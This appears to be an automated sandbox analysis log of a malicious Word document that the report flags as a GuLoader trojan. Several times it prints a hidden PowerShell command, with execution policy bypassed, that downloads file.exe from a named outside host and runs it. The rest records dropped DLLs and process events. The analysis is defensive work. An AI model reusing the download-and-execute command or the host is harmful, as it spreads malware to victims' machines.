Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Users\user\AppData\Roaming\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: TEPO0015922.LNK.0.drLNK file: ..\..\..\..\..\Desktop\TEPO0015922.doc
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO0015922.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63F0.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@29/33@2/1
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00402173 CoCreateInstance,MultiByteToWideChar,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Yara detected GuLoader
Source: Yara matchFile source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: libgdk_pixbuf-2.0-0.dll.9.drStatic PE information: section name: .xdata
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

Persistence and Installation Behavior

barindex
Tries to download and execute files (via powershell)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\file.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
